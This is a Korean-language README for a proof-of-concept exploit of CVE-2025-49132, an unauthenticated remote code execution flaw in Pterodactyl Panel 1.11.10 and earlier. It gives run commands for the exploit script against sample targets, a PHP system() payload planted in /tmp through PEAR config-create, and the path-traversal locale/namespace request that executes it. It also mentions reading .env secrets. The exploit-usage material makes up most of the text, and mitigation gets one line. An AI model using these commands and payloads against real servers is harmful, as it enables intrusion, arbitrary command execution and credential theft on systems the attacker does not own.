
CVE-2025-49132 (GHSA-24wv-6c99-f843)에 대한 PoC 익스플로잇 – Pterodactyl Panel ≤ 1.11.10에서의 인증되지 않은 원격 코드 실행
Pterodactyl 패널 - 인증되지 않은 원격 코드 실행 (RCE)
CVE-2025-49132는 Pterodactyl 패널 <= 1.11.10에 영향을 미치는 심각한 원격 코드 실행 취약점입니다.
인증되지 않은 공격자는 /locales/locale.json 엔드포인트에서 부적절한 입력 검증을 악용하여 임의의 시스템 명령을 실행할 수 있습니다.
패치된 버전: 1.11.11
성공적인 익스플로잇을 통해 다음이 가능합니다:
.env)심각도: 치명적
취약점은 다음 매개변수의 부적절한 검증으로 인해 발생합니다:
locale 매개변수namespace 매개변수공격자는 다음을 수행할 수 있습니다:
../../../../../) 악용config-create 활용/tmp에 기록취약점 분류: CWE-94 -- 코드 생성의 부적절한 제어
python3 CVE-2025-49132-dbs.py --target <호스트> --cmd "<명령>" [--path <pear_경로>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
기본 경로:
/usr/share/php/PEAR
/phpinfo.php 페이지에서 올바른 경로 확인

공격자는 /tmp/payload.php에 악성 PHP 페이로드를 주입합니다:
/<?=system('id')?>+/tmp/payload.php
다음을 호출하여:
?locale=../../../../../tmp&namespace=payload
서버가 주입된 PHP를 실행합니다.

locale 및 namespace 입력 검증